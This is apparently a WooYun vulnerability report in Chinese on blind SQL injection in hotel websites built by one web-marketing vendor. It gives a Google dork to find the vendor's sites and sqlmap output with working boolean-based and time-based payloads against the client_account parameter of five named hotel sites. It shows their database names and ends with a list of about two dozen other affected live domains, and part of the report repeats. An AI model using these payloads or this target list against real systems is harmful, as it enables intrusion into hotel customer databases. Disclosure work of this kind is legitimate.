WooYun.org

谷歌搜索:技术支持： 问途酒店网络营销

案例一：http://www.goldenhotel.com.cn
注册用户，修改资料抓包

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND 5892=5892 AND 'hQek'='hQek&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND (SELECT * FROM (SELECT(SLEEP(5)))VrDV) AND 'kWXO'='kWXO&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
---
back-end DBMS: MySQL 5.0.12
current database:    'dossm'

案例二：http://www.jadesea.cn/
注册用户，修改资料抓包

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND 8130=8130 AND 'VSoO'='VSoO&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND (SELECT * FROM (SELECT(SLEEP(5)))FFYs) AND 'ETTf'='ETTf&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'

案例三：http://www.royalmarinaplaza.com
注册，修改资料抓包

漏洞细节：
MYSQL注入
谷歌搜索:技术支持： 问途酒店网络营销
案例一：http://www.goldenhotel.com.cn
注册用户，修改资料抓包
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND 5892=5892 AND 'hQek'='hQek&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND (SELECT * FROM (SELECT(SLEEP(5)))VrDV) AND 'kWXO'='kWXO&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
---
back-end DBMS: MySQL 5.0.12
current database:    'dossm'
案例二：http://www.jadesea.cn/
注册用户，修改资料抓包
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND 8130=8130 AND 'VSoO'='VSoO&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND (SELECT * FROM (SELECT(SLEEP(5)))FFYs) AND 'ETTf'='ETTf&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"[email protected]","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'
案例三：http://www.royalmarinaplaza.com
注册，修改资料抓包
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery164018857463114227435_1428047679086&client_account=gz_marina' AND 4469=4469 AND 'XXFo'='XXFo&language=zh-cn&param={"last_name":"12312","first_name":"3123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"12312","certificate":"12312","email":"[email protected]","phone":"123123123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428047706785
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery164018857463114227435_1428047679086&client_account=gz_marina' AND (SELECT * FROM (SELECT(SLEEP(5)))TyVi) AND 'RIVg'='RIVg&language=zh-cn&param={"last_name":"12312","first_name":"3123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"12312","certificate":"12312","email":"[email protected]","phone":"123123123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428047706785
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'

案例四：http://www.xinyuexinhotel.com
注册，修改资料抓包

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery191007966794349840756_1428048874667&client_account=yn_sbgarden') AND 9868=9868 AND ('PuSv'='PuSv&language=zh-cn&code=&param={"title":"%E5%A5%B3%E5%A3%AB","last_name":"123123","first_name":"123123","mobile":"13852141232","email":"[email protected]","address":"123123","choose_reason":"%E4%BC%91%E9%97%B2%E5%BA%A6%E5%81%87","elevator":"%E5%96%9C%E6%AC%A2","smoke":"%E6%9C%89","bed_type":"%E5%A4%A7%E5%BA%8A","floor":"%E9%AB%98%E6%A5%BC%E5%B1%82","birthday":"2005-02-01","fields":{"title":"%E5%A5%B3%E5%A3%AB","last_name":"123123","first_name":"123123","mobile":"13852141232","email":"[email protected]","address":"123123","choose_reason":"%E4%BC%91%E9%97%B2%E5%BA%A6%E5%81%87","elevator":"%E5%96%9C%E6%AC%A2","smoke":"%E6%9C%89","bed_type":"%E5%A4%A7%E5%BA%8A","floor":"%E9%AB%98%E6%A5%BC%E5%B1%82","birthday":"2005-02-01"}}&_=1428048874670
---
back-end DBMS: MySQL >= 5.0.0
current database:    'd2'

案例五：http://www.resortintime.com
注册，修改资料抓包

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery16405680112944196926_1428049876334&client_account=sy_resortintime' AND 6089=6089 AND 'NxGY'='NxGY&language=zh-cn&param={"first_name":"1123","last_name":"123123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"123","certificate":"123","email":"[email protected]","phone":"123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428049910430
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery16405680112944196926_1428049876334&client_account=sy_resortintime' AND (SELECT * FROM (SELECT(SLEEP(10)))jkrZ) AND 'BqMN'='BqMN&language=zh-cn&param={"first_name":"1123","last_name":"123123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"123","certificate":"123","email":"[email protected]","phone":"123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428049910430
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'

列举受影响站点：
http://www.goldenhotel.com.cn
http://www.jadesea.cn
http://www.royalmarinaplaza.com
http://www.expo-gardenhotel.com
http://www.resortintime.com
http://www.glbravohotel.com
http://www.horizonsanya.com
http://www.xlhhotel.com
http://www.prgardenhotel.com.cn
http://www.xinyuexinhotel.com
http://www.vaya-hotel.cn
http://www.norincoeasun.com
http://www.lido-hotel.cn
http://www.easelandhotel.com
http://www.hongfuluxemon.com
http://www.cndhotels.com
http://www.harmonahotel.com
http://www.harmonahotel.com
http://www.tianfuyuan.com
http://www.royalgardenhotel.com.cn
http://www.yingbinhotel.cn
http://www.fcghotel.com
http://www.wx-hotel.com
http://www.dzhgz.com